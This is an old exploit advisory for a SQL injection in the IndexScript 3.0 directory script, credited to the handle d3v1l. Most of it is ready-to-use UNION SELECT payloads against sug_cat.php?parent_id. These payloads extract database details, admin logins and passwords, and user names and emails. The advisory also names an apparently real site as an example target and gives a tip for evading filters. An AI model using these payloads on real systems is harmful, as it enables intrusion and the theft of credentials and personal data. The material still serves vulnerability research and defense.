IndexScript 3.0 - 'parent_id' SQL Injection

EDB-ID:

6746

Author:

d3v1l

Type:

webapps

Platform:

PHP

Published:

2008-10-13

[~]-------------------------------------------------------------------------------------------------------------
[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
[~]
[~] http://www.indexscript.com/download.php
[~]    
[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l   [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] d3v1l@spoofer.com    http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
[~]
[~] Example :-
[~]
[~] http://spaceho.com/sug_cat.php?parent_id=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
[~]-------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-10-13]